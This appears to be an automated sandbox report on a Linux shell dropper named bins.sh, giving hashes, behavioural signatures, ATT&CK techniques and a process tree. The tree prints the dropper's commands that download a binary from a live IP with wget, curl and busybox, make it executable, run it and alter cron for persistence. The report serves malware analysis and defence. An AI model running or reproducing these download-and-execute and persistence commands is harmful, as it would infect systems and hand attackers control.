Analysis
-
max time kernel
114s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 18:27
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
49ff6a2cb20564750a63b55e97d1ab33
-
SHA1
002760981243e617f09aae9d51348ed8cbf15220
-
SHA256
f591850528c073e92ddf0c7c9e15277c4a32c26150f5da11e7e7bad58514e7e1
-
SHA512
a59a5dff228d17cc3f8997dc959386adf79208c4dc7b6f376792deb406e5da9b08090f94eba1dbd5d00356069bc5d4367403fe4fa24494b5d30167319b660b18
-
SSDEEP
192:OH55kd4A2eVeyFjrUl/Cu1jrUg2eVz55kdl:OH55kd4A2ecyI/Cu32e555kdl
Malware Config
Signatures
-
Contacts a large (2130) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 680 chmod -
Executes dropped EXE 1 IoCs
Processes:
CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYVioc pid process /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV 681 CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV -
Renames itself 1 IoCs
Processes:
CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYVpid process 682 CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.wM22Rl crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curldescription ioc process File opened for reading /proc/cpuinfo curl -
Processes:
CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYVdescription ioc process File opened for reading /proc/927/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1011/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1040/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/760/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/857/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/867/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/917/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/918/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/938/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1036/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1089/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/702/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/707/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/829/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/811/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/837/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/925/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/941/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/962/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/7/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/42/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/734/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/984/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1051/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1060/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/876/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/954/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/996/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1062/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1064/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/22/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/730/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/795/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/956/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/957/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/992/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/999/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1073/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/29/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/754/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/761/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1085/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/4/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/930/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1015/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/601/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/950/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1070/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1088/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/43/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/107/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/595/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/813/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/877/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/909/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/980/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/1087/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/16/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/277/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/300/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/748/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/750/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/858/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV File opened for reading /proc/165/cmdline CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc process File opened for modification /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV wget File opened for modification /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV curl File opened for modification /tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:647
-
/bin/rm/bin/rm bins.sh2⤵PID:649
-
/usr/bin/wgetwget http://87.120.84.230/bins/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Writes file to tmp directory
PID:651 -
/usr/bin/curlcurl -O http://87.120.84.230/bins/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:673 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Writes file to tmp directory
PID:679 -
/bin/chmodchmod 777 CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- File and Directory Permissions Modification
PID:680 -
/tmp/CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV./CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:681 -
/bin/shsh -c "crontab -l"3⤵PID:683
-
/usr/bin/crontabcrontab -l4⤵PID:684
-
/bin/shsh -c "crontab -"3⤵PID:685
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:686 -
/bin/rmrm CPYiMjs0Zzds0V5HEClwJlxpgei5HD5CYV2⤵PID:696
-
/usr/bin/wgetwget http://87.120.84.230/bins/r08YRx5AMJVQMmdbCM75UVt0H3zKz1SlAq2⤵PID:700
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD55a167604c3d591a50d80d31151507036
SHA1f62afb789b9422c605e305fada898043ff2bbb6f
SHA256a0df90fc363257329e6ae8a9ccb5926a0a93ed9160e9d27638036894cc32d25d
SHA512373bd00f68646c7be639e846e3cbea42075091d8ee2f28ccca3eff277d3a464121fb4f41ba8c8b8fe586c28725b30844b7606ed05b08da369801688d76d98672